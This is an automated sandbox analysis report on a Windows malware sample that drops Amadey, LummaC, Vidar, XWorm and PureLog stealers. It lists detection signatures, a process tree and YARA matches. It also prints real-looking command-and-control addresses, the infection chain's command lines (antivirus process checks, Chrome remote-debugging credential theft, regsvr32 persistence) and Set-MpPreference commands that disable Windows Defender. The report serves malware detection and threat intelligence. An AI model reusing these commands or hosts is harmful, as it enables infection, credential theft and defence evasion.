Edit tour

Windows Analysis Report
2E02vIiMfd.exe

Overview

General Information

Sample name:	2E02vIiMfd.exe renamed because original name is a hash value
Original sample name:	4afe2a44986c0257e8e8a1da5bb91f71.exe
Analysis ID:	1599822
MD5:	4afe2a44986c0257e8e8a1da5bb91f71
SHA1:	6920c0c338b403ecd4a1a4e8978ca2619346a271
SHA256:	de50ff03fcefbb22f6286f9fff0f4e18e9e6b99735d666a22d848cc3ebc594a4
Tags:	Amadeyexeuser-abuse_ch
Infos:

Detection

LummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Powershell launch regsvr32

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected AntiVM3

Yara detected AsyncRAT

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected Socks5Systemz

Yara detected Vidar stealer

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Drops PE files with a suspicious file extension

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Potentially malicious time measurement code found

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Potentially Suspicious Child Process Of Regsvr32

Suspicious powershell command line found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to resolve many domain names, but no domain seems valid

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Connects to many different domains

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

One or more processes crash

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries keyboard layouts

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: Browser Started with Remote Debugging

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Sigma detected: Potential Regsvr32 Commandline Flag Anomaly

Sigma detected: Suspicious Copy From or To System Directory

Stores large binary data to the registry

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

2E02vIiMfd.exe (PID: 6476 cmdline: "C:\Users\user\Desktop\2E02vIiMfd.exe" MD5: 4AFE2A44986C0257E8E8A1DA5BB91F71)

skotes.exe (PID: 7020 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 4AFE2A44986C0257E8E8A1DA5BB91F71)

skotes.exe (PID: 3400 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 4AFE2A44986C0257E8E8A1DA5BB91F71)

skotes.exe (PID: 3604 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 4AFE2A44986C0257E8E8A1DA5BB91F71)

c3d996d758.exe (PID: 6452 cmdline: "C:\Users\user\AppData\Local\Temp\1053875001\c3d996d758.exe" MD5: DB3632EF37D9E27DFA2FD76F320540CA)

BitLockerToGo.exe (PID: 3332 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

d1d4560504.exe (PID: 2832 cmdline: "C:\Users\user\AppData\Local\Temp\1053876001\d1d4560504.exe" MD5: 9CE7B5DC80B072328C7BBCDB1C787941)

cmd.exe (PID: 6768 cmdline: "C:\Windows\System32\cmd.exe" /c copy Fixed Fixed.cmd & Fixed.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 6456 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 6864 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 5424 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 2368 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 5316 cmdline: cmd /c md 567757 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 7100 cmdline: extrac32 /Y /E Activation MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 7104 cmdline: findstr /V "VIETNAM" Diagnostic MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 6300 cmdline: cmd /c copy /b 567757\Appeal.com + Entirely + Thumbnails + Atmospheric + Eternal + Quite + Strictly + Mongolia + Card + Decent 567757\Appeal.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 5064 cmdline: cmd /c copy /b ..\Tuner + ..\Rest + ..\Reservation + ..\Twiki j MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Appeal.com (PID: 4340 cmdline: Appeal.com j MD5: 62D09F076E6E0240548C2F837536A46A)

chrome.exe (PID: 6792 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 1076 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 --field-trial-handle=2192,i,17195581818120426655,15686609209049494560,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

choice.exe (PID: 3448 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

2328527160.exe (PID: 1888 cmdline: "C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe" MD5: BBD4D7F2BC61C62C5F165E1AAE3CA558)

2328527160.exe (PID: 6724 cmdline: "C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe" MD5: BBD4D7F2BC61C62C5F165E1AAE3CA558)

2328527160.exe (PID: 3396 cmdline: "C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe" MD5: BBD4D7F2BC61C62C5F165E1AAE3CA558)

WerFault.exe (PID: 1076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1888 -s 948 MD5: C31336C1EFC2CCB44B4326EA793040F2)

abd4306087.exe (PID: 4600 cmdline: "C:\Users\user\AppData\Local\Temp\1053878001\abd4306087.exe" MD5: 377D26C2E14018E30D78BD49DB75A5CB)

8a7032211b.exe (PID: 4464 cmdline: "C:\Users\user\AppData\Local\Temp\1053879001\8a7032211b.exe" MD5: 7C69B915375C9F44ED5367141A3F4C0A)

a58cbe76b9.exe (PID: 5468 cmdline: "C:\Users\user\AppData\Local\Temp\1053880001\a58cbe76b9.exe" MD5: B874C330B2D5405EC75C422053198A88)

BitLockerToGo.exe (PID: 1772 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)

714ab8b5fd.exe (PID: 7092 cmdline: "C:\Users\user\AppData\Local\Temp\1053881001\714ab8b5fd.exe" MD5: 134CA8D83E637CDB9CC6F85415135774)

c90cec6187.exe (PID: 1448 cmdline: "C:\Users\user\AppData\Local\Temp\1053882001\c90cec6187.exe" MD5: 2A64314ECF5802E9E0EDB3CD12D25991)

c90cec6187.tmp (PID: 1848 cmdline: "C:\Users\user\AppData\Local\Temp\is-GBSQT.tmp\c90cec6187.tmp" /SL5="$100068,3422545,56832,C:\Users\user\AppData\Local\Temp\1053882001\c90cec6187.exe" MD5: 6299F876480685D0F685E8F04DB435E5)

crossplatformplayer.exe (PID: 4856 cmdline: "C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe" -i MD5: E6E68CCEFE5E77753518B7D1FED81688)

ac911b4662.exe (PID: 1508 cmdline: "C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe" MD5: EBE8A0F61F53A3817C3FBCC3AB3A1F4C)

ac911b4662.tmp (PID: 2896 cmdline: "C:\Users\user\AppData\Local\Temp\is-PAS4F.tmp\ac911b4662.tmp" /SL5="$2043A,1104885,161792,C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe" MD5: BCC236A3921E1388596A42B05686FF5E)

ac911b4662.exe (PID: 2148 cmdline: "C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe" /VERYSILENT MD5: EBE8A0F61F53A3817C3FBCC3AB3A1F4C)

ac911b4662.tmp (PID: 4812 cmdline: "C:\Users\user\AppData\Local\Temp\is-ADPLF.tmp\ac911b4662.tmp" /SL5="$30440,1104885,161792,C:\Users\user\AppData\Local\Temp\1053883001\ac911b4662.exe" /VERYSILENT MD5: BCC236A3921E1388596A42B05686FF5E)

regsvr32.exe (PID: 2852 cmdline: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)

regsvr32.exe (PID: 6264 cmdline: /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

powershell.exe (PID: 6312 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

14484258fa.exe (PID: 2380 cmdline: "C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe" MD5: B4B23395474EED4DF3B8113D90FDF3F0)

svchost.exe (PID: 6984 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 4412 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1888 -ip 1888 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 6844 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": "https://toppyneedus.biz/api", "Build Version": "Jxy8Jp--new"}

Threatname: Xworm

{"C2 url": ["91.212.166.99"], "Port": 4404, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199819539662", "Botnet": "go2dniz"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author
sslproxydump.pcap	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\1053884001\14484258fa.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1053877001\2328527160.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000001D.00000003.2822481060.00000000010D6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000003.1718248994.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002A.00000002.4193180482.0000000002560000.00000040.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000002A.00000002.4193180482.0000000002560000.00000040.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000002A.00000002.4193180482.0000000002560000.00000040.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x9aa5:$s6: VirtualBox 0x9a03:$s8: Win32_ComputerSystem 0xa5a7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xa644:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xa759:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa103:$cnc4: POST / HTTP/1.1
0000001D.00000003.2822616408.00000000010F1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000016.00000000.2236560137.0000000000AC2000.00000002.00000001.01000000.0000000D.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000021.00000003.2989447188.00000000011DF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002A.00000002.4185157711.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000002A.00000002.4185157711.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000002A.00000002.4185157711.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x28365:$s6: VirtualBox 0x282c3:$s8: Win32_ComputerSystem 0x28e67:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x28f04:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x29019:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x289c3:$cnc4: POST / HTTP/1.1
00000024.00000002.4195692760.0000000002C61000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security
0000001D.00000003.2846601885.00000000010F1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002A.00000002.4194977140.000000000288A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000014.00000003.2709397792.0000000001C1C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000003.1697769446.0000000005220000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000014.00000002.3739881642.0000000004FA1000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000021.00000003.2737975920.0000000001232000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002A.00000002.4194977140.0000000002841000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000007.00000002.2718587583.000000000A010000.00000004.00001000.00020000.00000000.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x0:$x1: 4d5a9000030000000
00000014.00000002.3649929650.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000021.00000003.3003073654.00000000011F3000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.2709605016.0000000004FA4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0000002A.00000002.4309071983.000000001B910000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x4811:$reg1: SOFTWARE\Microsoft\Windows Defender\Features 0x4891:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4916:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6a9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6b59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6bd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x6da1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender 0x4daf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true 0x4e67:$s2: Set-MpPreference -DisableArchiveScanning $true 0x4f07:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true 0x4fa5:$s4: Set-MpPreference -DisableScriptScanning $true 0x502f:$s5: Set-MpPreference -SubmitSamplesConsent 2 0x509d:$s6: Set-MpPreference -MAPSReporting 0 0x5115:$s7: Set-MpPreference -HighThreatDefaultAction 6 0x51b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6 0x5241:$s9: Set-MpPreference -LowThreatDefaultAction 6 0x52cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6 0x5422:$e2: Add-MpPreference -ExclusionPath
00000016.00000002.2569687773.0000000003F19000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000003.1728546022.0000000004A80000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000002.00000002.1769320101.0000000000611000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000002A.00000002.4194977140.00000000028EE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000001.00000002.1758500681.0000000000611000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000031.00000002.3028149914.0000000003B1F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1738033448.0000000000A21000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000006.00000002.4184886645.0000000000611000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000001D.00000003.2840218742.00000000010D6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002A.00000002.4191598560.0000000002530000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000002A.00000002.4191598560.0000000002530000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0000002A.00000002.4191598560.0000000002530000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0000002A.00000002.4191598560.0000000002530000.00000004.08000000.00040000.00000000.sdmp	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x7702:$str01: $VB$Local_Port 0x76f3:$str02: $VB$Local_Host 0x79b1:$str03: get_Jpeg 0x7449:$str04: get_ServicePack 0x8877:$str05: Select * from AntivirusProduct 0x8a75:$str06: PCRestart 0x8a89:$str07: shutdown.exe /f /r /t 0 0x8b3b:$str08: StopReport 0x8b11:$str09: StopDDos 0x8c07:$str10: sendPlugin 0x8da5:$str12: -ExecutionPolicy Bypass -File " 0x8eca:$str13: Content-length: 5235
0000002A.00000002.4191598560.0000000002530000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8787:$s6: VirtualBox 0x86e5:$s8: Win32_ComputerSystem 0x9289:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9326:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x943b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x8de5:$cnc4: POST / HTTP/1.1
00000024.00000002.4194980301.0000000002BBB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Socks5Systemz	Yara detected Socks5Systemz	Joe Security
00000014.00000003.2709470347.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000006.00000003.1959401414.0000000004980000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000014.00000002.3649929650.0000000004D19000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: Appeal.com PID: 4340	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: Appeal.com PID: 4340	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: Appeal.com PID: 4340	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 2328527160.exe PID: 3396	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 8a7032211b.exe PID: 4464	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 8a7032211b.exe PID: 4464	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 8a7032211b.exe PID: 4464	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 3332	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: BitLockerToGo.exe PID: 3332	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
